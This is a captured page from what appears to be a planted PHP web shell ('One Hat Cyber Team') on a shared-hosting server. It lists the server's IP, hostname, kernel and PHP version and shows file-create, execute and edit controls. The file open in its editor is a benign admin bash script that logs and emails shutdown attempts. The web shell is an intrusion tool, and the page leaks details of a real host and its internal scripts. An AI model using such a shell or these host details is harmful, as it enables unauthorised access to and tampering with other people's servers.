One Hat Cyber Team
Your IP :
18.219.80.142
Server IP :
192.145.235.60
Server :
Linux ngx365.inmotionhosting.com 5.14.0-427.33.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 30 09:45:56 EDT 2024 x86_64
Server Software :
Apache
PHP Version :
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
sharedrads
/
Edit File:
ctrl_alt_del
#!/usr/bin/bash #Wrapper to get the environment when shutdown is called rightnow=$(date +%s) filename=$(echo -n "/root/shutdown-$rightnow.log") echo "Shutdown log $filename" > $filename echo "Open files of parent $PPID:" >> $filename lsof -p $PPID >> $filename echo >> $filename echo "Parent/Child tree:" >> $filename ps faux >> $filename echo >> $filename echo "Environment variables:" >> $filename env >> $filename echo >> $filename echo "Arguments:" >> $filename echo "shutdown $@" >> $filename cat $filename | mail -s "Shutdown event on $(/bin/hostname) at $rightnow" steam@imhadmin.net echo "This shutdown attempt has been logged. If you really need to shutdown the server, use the shutdown command."
Simpan